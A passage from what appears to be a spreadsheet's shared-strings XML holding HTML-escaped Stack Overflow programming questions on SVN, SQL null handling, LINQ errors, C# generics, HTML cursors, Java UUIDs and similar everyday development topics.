&lt;p&gt;In order to do this I will need to extract the RepositoryVersion and RepositoryPath represented by the working copy folder that the BuildFile sits within.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How do I extract this information from any given .svn folder into the 2 nant variables?&lt;/strong&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find the installation directory of a third-party application, such as Google Earth, using C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code fragment that starts a &lt;a href="http://en.wikipedia.org/wiki/Google_Earth" rel="nofollow"&gt;Google Earth&lt;/a&gt; process using a hardcoded path:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var process =
    new Process
        {
            StartInfo =
                {
                    //TODO: Get location of google earth executable from registry
                    FileName = @"C:\Program Files\Google\Google Earth\googleearth.exe",
                    Arguments = "\"" + kmlPath + "\""
                }
        };
process.Start();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to programmatically fetch the installation location of &lt;em&gt;googleearth.exe&lt;/em&gt; from somewhere (most likely the registry).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.Net: Approaches to multilingual websites with Javascript and AJAX</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've recently completed phase 1 of a ASP.Net website in English and French. We went with using resource files to store language specific strings, but because the site used ASP.Net AJAX and javascript heavily we rigged up a solution to pass the right files through the ASP.Net pipeline where we could catch "tokens" and replace them with the appropriate text pulled from the resource files. &lt;/p&gt;
&lt;p&gt;This is the second project I've been involved in that had these kinds of challenges, the first one stored the text strings in a database, and instead of ASP.Net AJAX, it used the AJAX tools that come with the Prototype library and put all Javascript into aspx files so that the tokens could be replaced on the way out.&lt;/p&gt;
&lt;p&gt;What I'm wondering is, has anyone else encountered a similar scenario? What approach did you take? What lessons were learned? How did you deal with things like internationalized date formats?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does one weed out dependencies in a large project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm about to inherit a rather large Java enterprise project that has a large amount of third party dependencies. There is at least seventy JARs included and some of them would seem to be unused e.g. spring.jar which I know isn't used.&lt;/p&gt;
&lt;p&gt;It seems that over the years as various developers have touched upon the code base they have all tried out new project-of-the-month type libraries.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How does one go about getting rid of these?&lt;/strong&gt; Within reason of course, as clearly some dependencies are helpful to not have to re-invent the wheel. &lt;/p&gt;
&lt;p&gt;I'm obviously interested in java based projects but I'm welcome to answers across languages that people think will be helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I protect all worksheet in an Excel workbook with a single click?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have around 25 worksheets in my workbook (Excel spreadsheet).
Is there a way I can protect all the 25 worksheets in single click ? or this feature is not available and I will have to write a VBA code to accomplish this. I need very often to protect all sheets and unprotect all sheets and doing individually is time consuming&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find beginning of sentence in String</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to display the results of a searchquery in a website with a title and a short description. The short description should be a small part of the page which holds the searchterm. What i want to do is:
1 strip tags in page
2 find first position of seachterm
3 from that position, going back find the beginning (if there is one) of that sentence.
4 Start at the found position in step 3 and display ie 200 characters from there&lt;/p&gt;
&lt;p&gt;I need some help with step 3. I think i need an regex that finds the first capital or dot...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you change your apparent country of origin to test a site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to set my country of origin - does this involve testing through a proxy, or is there something that can be set else where?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get null == null in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish to search a database table on a nullable column.  Sometimes the value I'm search for is itself NULL.  Since Null is equal to nothing, even NULL, saying&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;where MYCOLUMN=SEARCHVALUE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will fail.  Right now I have to resort to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;where ((MYCOLUMN=SEARCHVALUE) OR (MYCOLUMN is NULL and SEARCHVALUE is NULL))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a simpler way of saying that?&lt;/p&gt;
&lt;p&gt;(I'm using Oracle if that matters)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strange LINQ Exception (Index out of bounds)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table, we'll call &lt;code&gt;Users&lt;/code&gt;. This table has a single primary key defined in SQL Server - an autoincrement &lt;code&gt;int ID&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Sometimes, my LINQ queries against this table fail with an &lt;code&gt;"Index was outside the range"&lt;/code&gt; error - even the most simplest of queries. The query itself doesn't use any indexers.&lt;/p&gt;
&lt;p&gt;For example:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;User = Users.Take(1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IEnumerable&amp;lt;Users&amp;gt; = Users.ToList();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Both of the queries threw the same error. Using the debugger Visualizer to look at the generated query - I copy and paste the query in SQL and it works fine. I also click "execute" on the visualizer and it works fine. But executing the code by itself throws this error. I don't implement any of the partial methods on the class, so nothing is happening there. If I restart my debugger, the problem goes away, only to rear it's head again randomly a few hours later. More critically, I see this bug in my error logs from the app running in production.  &lt;/p&gt;
&lt;p&gt;I do a ton of LINQ in my app, against a dozen or so different entities in my database, but I only see this problem on queries related to a specific entity in my table. Some googling has suggested that this problem might be related to an incorrect relationship specified between my model and another entity, but I don't have &lt;em&gt;any&lt;/em&gt; relationships with this object.  It seems to be working 95% of the time, it's just the other 5% that fail.&lt;/p&gt;
&lt;p&gt;I have completely deleted the object from the designer, and re-added it from a "refreshed" server browser, and that did not fix the problem.&lt;/p&gt;
&lt;p&gt;Any ideas what's going on here?&lt;/p&gt;
&lt;p&gt;Here's the full error message and stack trace:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Index was out of range. Must be non-negative and less than the size of
  the collection. Parameter name: index at
  System.Data.Linq.SqlClient.SqlProvider.Execute(Expression query,
  QueryInfo queryInfo, IObjectReaderFactory factory, Object[]
  parentArgs, Object[] userArgs, ICompiledSubQuery[] subQueries, Object
  lastResult) at
  System.Data.Linq.SqlClient.SqlProvider.ExecuteAll(Expression query,
  QueryInfo[] queryInfos, IObjectReaderFactory factory, Object[]
  userArguments, ICompiledSubQuery[] subQueries) at
  System.Data.Linq.SqlClient.SqlProvider.System.Data.Linq.Provider.IProvider.Execute(Expression
  query) at
  System.Data.Linq.Table&lt;code&gt;1.System.Linq.IQueryProvider.Execute[TResult](Expression
  expression) at
  System.Linq.Queryable.FirstOrDefault[TSource](IQueryable&lt;/code&gt;1 source,
  Expression`1 predicate) at MyProject.FindUserByType(String typeId)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;EDIT: As requested, below is a copy of the table schema.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE [dbo].[Container](
[ID] [int] IDENTITY(1,1) NOT NULL,
[MarketCode] [varchar](max) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL,
[Description] [varchar](max) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL,
[Capacity] [int] NOT NULL,
[Volume] [float] NOT NULL
 CONSTRAINT [PK_Container] PRIMARY KEY CLUSTERED 
(
[ID] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT: The stack trace shows &lt;code&gt;FirstOrDefault&lt;/code&gt;, but I duplicated the error using both &lt;code&gt;Take()&lt;/code&gt; and &lt;code&gt;ToList()&lt;/code&gt;.  The stack trace is identical between all of these, simply interchangnig &lt;code&gt;FirstOrDefault/Take/ToList&lt;/code&gt;.  The move down the stack to &lt;code&gt;SqlProvider.Execute&lt;/code&gt; is in fact identical.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuring python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to python and struggling to find how to control the amount of memory a python process can take? I am running python on a Cento OS machine with more than 2 GB of main memory size. Python is taking up only 128mb of this and I want to allocate it more. I tried to search all over the internet on this for last half an hour and found absolutely nothing! Why is it so difficult to find information on python related stuff :(&lt;/p&gt;
&lt;p&gt;I would be happy if someone could throw some light on how to configure python for various things like allowed memory size, number of threads etc.&lt;/p&gt;
&lt;p&gt;A link to a site where most controllable parameters of python are described would be appreciated well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Give DROP PROCEDURE a parameter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using SqlServer for the first time, and in every single one of our create procedure scripts there is a block of code like below to remove the procedure if it already exists:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IF EXISTS (SELECT *
           FROM information_schema.routines
           WHERE routine_name = 'SomeProcedureName'
           AND routine_type = 'PROCEDURE'
BEGIN
    DROP PROCEDURE SomeProcedureName
END
//then the procedure definition
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To stop cutting and pasting this boilerplate code in every file I would like to put this code in its own stored procedure so that instead the scripts would look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DropIfRequired('SomeProcedureName')
//then the procedure definition
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My attempt at a solution is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE PROCEDURE DropIfRequired
(
    @procedureName varchar
)
AS
IF EXISTS (SELECT * FROM information_schema.routines 
           WHERE routine_name = @procedureName 
           AND routine_type = 'PROCEDURE') 
BEGIN
    DROP PROCEDURE @procedureName
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I then get the following error:&lt;/p&gt;
&lt;p&gt;Msg 102, Level 15, State 1, Procedure DeleteProcedure, Line 10
Incorrect syntax near '@procedureName'.&lt;/p&gt;
&lt;p&gt;Any ideas how to do what I want?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Generics won't allow Delegate Type Constraints</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to define a class in C# such that&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class GenericCollection&amp;lt;T&amp;gt; : SomeBaseCollection&amp;lt;T&amp;gt; where T : Delegate
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I couldn't for the life of me accomplish this last night in .NET 3.5. I tried using&lt;/p&gt;
&lt;p&gt;&lt;code&gt;delegate, Delegate, Action&amp;lt;T&amp;gt; and Func&amp;lt;T, T&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;It seems to me that this should be allowable in some way. I'm trying to implement my own EventQueue.&lt;/p&gt;
&lt;p&gt;I ended up just doing this [primitive approximation mind you].&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;internal delegate void DWork();
class EventQueue {
    private Queue&amp;lt;DWork&amp;gt; eventq;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But then I lose the ability to reuse the same definition for different types of functions.&lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to resolve incorrect "Ambiguous reference" from ReSharper on class inheritance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my project I have a class that is inherited by many other classes. We'll call it ClassBase.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ClassInheritFromBase : ClassBase
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When ClassBase is being inherited, &lt;a href="http://en.wikipedia.org/wiki/ReSharper" rel="nofollow"&gt;ReSharper&lt;/a&gt; throws an "Ambiguous reference" warning on the ClassBase, and anything inside the new class that inherited from ClassBase does not have IntelliSense and gets warnings that it cannot find it.&lt;/p&gt;
&lt;p&gt;The project compiles and runs fine.&lt;/p&gt;
&lt;p&gt;If I change the namespace ClassBase is in and then change the inheriting classes, they find it fine and ReSharper has no problem, IntelliSense works ... until it is compiled. After the compile it goes back to having the ambiguous reference warnings and everything else.&lt;/p&gt;
&lt;p&gt;Has this been seen before and how can it be fixed? I saw an entry in JetBrains bug tracking for an issue just like this, but they closed it as unable to reproduce.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NT AUTHORITY\NETWORK SERVICE issue when deploying on remote server SQL 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting a very non specific error when trying to connect to SQL server on remote server. I feel like I have made all the correct settings, allow TCP/IP, restarted the service, added rights to NT AUTHORITY\NETWORK SERVICE and other related users for the database. I can get to the aspx page, but as soon as I hit submit on the login I get: &lt;/p&gt;
&lt;p&gt;Exception information: 
    Exception type: SqlException 
    Exception message: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) &lt;/p&gt;
&lt;p&gt;Thank you for your help. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>In an MFC application, what's the easiest way to copy a file from one directory to another?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should I create two CFile objects and copy one into the other character by character?  Or is there something in the library that will do this for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox Links to local or network pages do not work</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .asp application where image files (.PDF) are stored in a directory (fed by a copier/scanner). The created file names are stored in a database table.  When a query is launched from  the web page a link to the file is created. When clicked the image should be displayed.
This functionality works 100% in Internet Explorer. No such luck in Firefox (and I have some Firefox users). The created hyperlink looks like this &lt;code&gt;file://Server/Scanner/XYZ.pdf&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The Firefox helps suggest the reason is this:  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Links to local or network pages do not work. As a security precaution, Firefox forbids sites on the Internet to link to files that are stored in your local computing environment. These files may include files on your computer, mapped network drives, and UNC network paths&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;None of the suggestions for a workaround seem to work (or I am not understanding the steps to create the image display) 
Any Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you design a functional program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From day 1 of my programming career, I started with object-oriented programming. However, I'm interested in learning other paradigms (something which I've said here on SO a number of times is a good thing, but I haven't had the time to do). I think I'm not only ready, but have the time, so I'll be starting functional programming with F#.&lt;/p&gt;
&lt;p&gt;However, I'm not sure how to structure much less design applications. I'm used to the one-class-per-file and class-noun/function-verb ideas in OO programming. How do you design and structure functional applications?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to extract .NET 2.0 from the .NET 3.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;.NET Framework 3.5 SP1 installs the .NET Framework 2.0 SP2 and the .NET Framework 3.0 SP2 behind the scenes. These installation packages (especially .NET Framework 2.0 SP2) are not available directly from Microsoft.&lt;/p&gt;
&lt;p&gt;Is there a way to extract them from the .NET Framework 3.5 SP1 installation package?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there caveats to dynamicly creating a form with javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to do a cross site POST (with a redirection, so not using a XMLHTTPRequest), and the base platform is ASP.NET. I don't want to POST all of the controls in the ASP.NET FORM to this other site, so I was considering dynamicly creating a new form element using javascript and just posting that.&lt;/p&gt;
&lt;p&gt;Has anyone tried this trick? Is there any caveats?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the most efficient/elegant way to parse a flat table into a tree?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume you have a flat table that stores an ordered tree hierarchy:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Id   Name         ParentId   Order
 1   'Node 1'            0      10
 2   'Node 1.1'          1      10
 3   'Node 2'            0      20
 4   'Node 1.1.1'        2      10
 5   'Node 2.1'          3      10
 6   'Node 1.2'          1      20
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's a diagram, where we have &lt;code&gt;[id] Name&lt;/code&gt;.  Root node 0 is fictional.&lt;/p&gt;
&lt;pre&gt;
                       [0] ROOT
                          /    \ 
              [1] Node 1          [3] Node 2
              /       \                   \
    [2] Node 1.1     [6] Node 1.2      [5] Node 2.1
          /          
 [4] Node 1.1.1
&lt;/pre&gt;
&lt;p&gt;What minimalistic approach would you use to output that to HTML (or text, for that matter) as a correctly ordered, correctly indented tree? &lt;/p&gt;
&lt;p&gt;Assume further you only have basic data structures (arrays and hashmaps), no fancy objects with parent/children references, no ORM, no framework, just your two hands. The table is represented as a result set, which can be accessed randomly. &lt;/p&gt;
&lt;p&gt;Pseudo code or plain English is okay, this is purely a conceptional question.&lt;/p&gt;
&lt;p&gt;Bonus question: Is there a fundamentally better way to store a tree structure like this in a RDBMS?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;EDITS AND ADDITIONS&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To answer one commenter's (&lt;a href="http://stackoverflow.com/users/17826/mark-bessey"&gt;Mark Bessey&lt;/a&gt;'s) question: A root node is not necessary, because it is never going to be displayed anyway. ParentId = 0 is the convention to express "these are top level". The Order column defines how nodes with the same parent are going to be sorted.&lt;/p&gt;
&lt;p&gt;The "result set" I spoke of can be pictured as an array of hashmaps (to stay in that terminology). For my example was meant to be already there. Some answers go the extra mile and construct it first, but thats okay.&lt;/p&gt;
&lt;p&gt;The tree can be arbitrarily deep. Each node can have N children. I did not exactly have a "millions of entries" tree in mind, though.&lt;/p&gt;
&lt;p&gt;Don't mistake my choice of node naming ('Node 1.1.1') for something to rely on. The nodes could equally well be called 'Frank' or 'Bob', no naming structure is implied, this was merely to make it readable.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;I have posted my own solution so you guys can pull it to pieces.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calculating a date around working days/hours?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on a website to track projects. In it, it is possible to create Service Level Agreements (SLAs). These are configurable with days of the week that a project can be worked on and also the timespan on each of those days. Eg. on Monday it might be between 08:00 and 16:00 and then on friday from 10:00 to 14:00. They are also configured with a deadline time depending on priority. Eg. a project created with the "Low" priority has a deadline time of two weeks, and a project with "High" priority has a deadline of four hours.&lt;/p&gt;
&lt;p&gt;The problem I'm having is calculating the deadline AROUND the hours described earlier. Say I create a project on Monday at 14:00 with a "High" priority. That means I have four hours for this project. But because of the working hours, I have two hours on monday (untill 16:00) and then another two hours on Friday. That means the Deadline must be set for Friday at 12:00.&lt;/p&gt;
&lt;p&gt;I've spent quite some time googling this, and I can find quite a few examples of finding out how many working hours there are between a given start end ending date. I just can't figure out how to convert it into FINDING the ending datetime, given a starting time and an amount of time untill the deadline.&lt;/p&gt;
&lt;p&gt;The day/timespans are stored in an sql database in the format:&lt;/p&gt;
&lt;p&gt;Day(Eg. 1 for Monday)   StartHour	EndHour&lt;/p&gt;
&lt;p&gt;The StartHour/EndHour are saved as DateTimes, but of course only the time part is important.&lt;/p&gt;
&lt;p&gt;The way I figure it is, I have to somehow iterate through these times and do some datetime calculations. I just can't quite figure out what those calculations should be, what the best way is.&lt;/p&gt;
&lt;p&gt;I found &lt;a href="http://stackoverflow.com/questions/5260/what-is-the-best-way-to-wrap-time-around-the-work-day"&gt;this Question&lt;/a&gt; here on the site as I was writing this. It is sort of what I want and I'm playing with it right now, but I'm still lost on how exactly to make it work around my dynamic work days/hours.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox 'Error loading script' loading Google Analytics in FF2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The project I'm working on uses a window.onerror event handler to report user problems.  I've noticed a single user that just cannot seem to load the Google Analytics script.  Our site doesn't see a lot of traffic so I'm not sure how widespread this is, but so far it seems to just effect one user.  &lt;/p&gt;
&lt;p&gt;His user agent is: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17".&lt;br /&gt;
The error message Firefox gives is: "Error loading script".&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Additional note&lt;/strong&gt;: The site references several other javascript files.  However, the analytics reference is the only one to an external domain and the only script reference at the bottom of the page, just before the closing body tag.&lt;/p&gt;
&lt;p&gt;Has anybody else run across this, or have any idea what could be the issue?  Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SVN checkout filtered by file extension?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a home-grown automated build script in the form of a DOS batch file.  In part of that script, I check out (with "svn checkout") a section of our SVN repository that includes a bunch of third-party stuff that's used in our projects.  This batch file performed pretty well for a long time, but now people have checked in lots of fluff (docs, sample code, etc.) into the third-party area and the checkout part of this script has gotten lots slower.  I'd like to mitigate this by checking out only the stuff we need -- mostly dll files in our case.  So, my question is this: what's the best way to check out an SVN repository filtered by file extension?&lt;/p&gt;
&lt;p&gt;I didn't see any obvious way to do this in the svn help.  I have a .NET utility library that wraps svn.exe in some ways, and I was thinking of extending this to retrieve only content that matched my extensions of interest.  But I'd prefer to use an easier or existing method if one exists.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wait cursor over entire html page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to set the cursor to 'wait' on the entire html page in a simple way? The idea is to show the user that something is going on while an ajax call is being completed. The code below shows a simplified version of what I tried and also demonstrate the problems I run into:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;if an element (#id1) has a cursor style set it will ignore the one set on body (obviously)  &lt;/li&gt;
&lt;li&gt;some elements have a default cursor style (a) and will not show the wait cursor on hover  &lt;/li&gt;
&lt;li&gt;the body element has a certain height depending on the content and if the page is short, the cursor will not show below the footer&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The test:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
    &amp;lt;head&amp;gt;
        &amp;lt;style type="text/css"&amp;gt;
            #id1 {
                background-color: #06f;
                cursor: pointer;
            }
            #id2 {
                background-color: #f60;
            }
        &amp;lt;/style&amp;gt;
    &amp;lt;/head&amp;gt;
    &amp;lt;body&amp;gt;
        &amp;lt;div id="id1"&amp;gt;cursor: pointer&amp;lt;/div&amp;gt;
        &amp;lt;div id="id2"&amp;gt;no cursor&amp;lt;/div&amp;gt;
        &amp;lt;a href="#" onclick="document.body.style.cursor = 'wait'; return false"&amp;gt;Do something&amp;lt;/a&amp;gt;
    &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Later edit...&lt;br /&gt;
It worked in firefox and IE with:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;div#mask { display: none; cursor: wait; z-index: 9999; 
position: absolute; top: 0; left: 0; height: 100%; 
width: 100%; background-color: #fff; opacity: 0; filter: alpha(opacity = 0);}
&amp;lt;a href="#" onclick="document.getElementById('mask').style.display = 'block'; return false"&amp;gt;
Do something&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem with (or feature of) this solution is that it will prevent clicks because of the overlapping div (thanks Kibbee)&lt;/p&gt;
&lt;p&gt;Later later edit...&lt;br /&gt;
A simpler solution from Dorward:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.wait, .wait * { cursor: wait !important; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="#" onclick="document.body.className = 'wait'; return false"&amp;gt;Do something&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This solution only shows the wait cursor but allows clicks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating a globally unique identifier in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; I'm developing a persistent Java web application, and I need to make sure that all resources I persist have globally unique identifiers to prevent duplicates.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Fine Print:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I'm not using an RDBMS, so I don't have any fancy sequence generators (such as the one provided by Oracle)&lt;/li&gt;
&lt;li&gt;I'd like it to be fast, preferably all in memory - I'd rather not have to open up a file and increment some value&lt;/li&gt;
&lt;li&gt;It needs to be thread safe (I'm anticipating that only one JVM at a time will need to generate IDs)&lt;/li&gt;
&lt;li&gt;There needs to be consistency across instantiations of the JVM.  If the server shuts down and starts up, the ID generator shouldn't re-generate the same IDs it generated in previous instantiations (or at least the chance has to be really, really slim - I anticipate many millions of presisted resources)&lt;/li&gt;
&lt;li&gt;I have seen the examples in the EJB unique ID pattern article.  They won't work for me (I'd rather not rely solely on System.currentTimeMillis() because we'll be persisting multiple resources per millisecond).&lt;/li&gt;
&lt;li&gt;I have looked at the answers proposed in &lt;a href="http://stackoverflow.com/questions/41107/how-to-generate-a-random-alpha-numeric-string-in-java"&gt;this question&lt;/a&gt;.  My concern about them is, what is the chance that I will get a duplicate ID over time?  I'm intrigued by the suggestion to use &lt;a href="http://java.sun.com/j2se/1.5.0/docs/api/java/util/UUID.html" rel="nofollow"&gt;java.util.UUID&lt;/a&gt; for a &lt;a href="https://en.wikipedia.org/wiki/Universally_unique_identifier" rel="nofollow"&gt;UUID&lt;/a&gt;, but again, the chances of a duplicate need to be infinitesimally small.&lt;/li&gt;
&lt;li&gt;I'm using JDK6&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Storing PCRE compiled regexes in C/C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an efficient way to store the compiled regexes (compiled via regcomp(), PCRE) in a binary file, so that later I can just read from the file and call regexec()?&lt;/p&gt;
&lt;p&gt;Or is it just a matter of dumping the compiled regex_t structs to the file and reading them back when needed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TListBox Drag and Drop problems with MultiSelect enabled</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a TListBox with multiselect and ExtendedSelect both set to true. I need to be able to drag multiple items in the list box to re-arrange them.  My problem is what happens when the user clicks on an item that is already selected without holding down the CTRL or SHIFT key.&lt;/p&gt;
&lt;p&gt;Case 1: DragMode is set to dmManual
The selection is cleared before the mouse down.  This will not allow multiple items to be dragged.&lt;/p&gt;
&lt;p&gt;Case 2: DragMode is set to dmAutomatic
The MouseDown event never fires.  The selection is not cleared so dragging is OK, but the user cannot clear the selection by clicking on one of the selected items.  This really causes a problem if all the items are selected or the next item the user wants to select was part of the current selection.&lt;/p&gt;
&lt;p&gt;Note that this problem only happens if you assign something to the DragObject in the OnStartDrag procedure.  I think the problem would go away if OnStartDrag would only start after the user moves the mouse.  I have Mouse.DragImmediate := false set but I still get the StartDrag fired as soon as I click on an item in the list box.&lt;/p&gt;
&lt;p&gt;I am using Delphi 7 for this project but I see the same behavior in Delphi 2007.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Boiler plate code replacement - is there anything bad about this code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently created these two (unrelated) methods to replace lots of boiler-plate code in my winforms application. As far as I can tell, they work ok, but I need some reassurance/advice on whether there are some problems I might be missing.&lt;/p&gt;
&lt;p&gt;(from memory)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static class SafeInvoker
{
    //Utility to avoid boiler-plate InvokeRequired code
    //Usage: SafeInvoker.Invoke(myCtrl, () =&amp;gt; myCtrl.Enabled = false);
    public static void Invoke(Control ctrl, Action cmd)
    {
        if (ctrl.InvokeRequired)
            ctrl.BeginInvoke(new MethodInvoker(cmd));
        else
            cmd();
    }
    //Replaces OnMyEventRaised boiler-plate code
    //Usage: SafeInvoker.RaiseEvent(this, MyEventRaised)
    public static void RaiseEvent(object sender, EventHandler evnt)
    {
        var handler = evnt;
        if (handler != null)
            handler(sender, EventArgs.Empty);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT: See related question &lt;a href="http://stackoverflow.com/questions/258409/how-to-get-information-about-an-exception-raised-by-the-target-of-controlinvoke"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Following on from deadlock problems (related in &lt;a href="http://stackoverflow.com/questions/2055960/control-invoke-getting-stuck-in-hidden-showdialog"&gt;this question&lt;/a&gt;), I have switched from Invoke to BeginInvoke (see an explanation &lt;a href="http://stackoverflow.com/questions/229554/whats-the-difference-between-invoke-and-begininvoke/229558#229558"&gt;here&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Another Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Regarding the second snippet, I am increasingly inclined to use the 'empty delegate' pattern, which fixes this problem 'at source' by declaring the event directly with an empty handler, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;event EventHandler MyEventRaised = delegate {};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I use constants from a Perl module?</t>
  </si>
  <si>
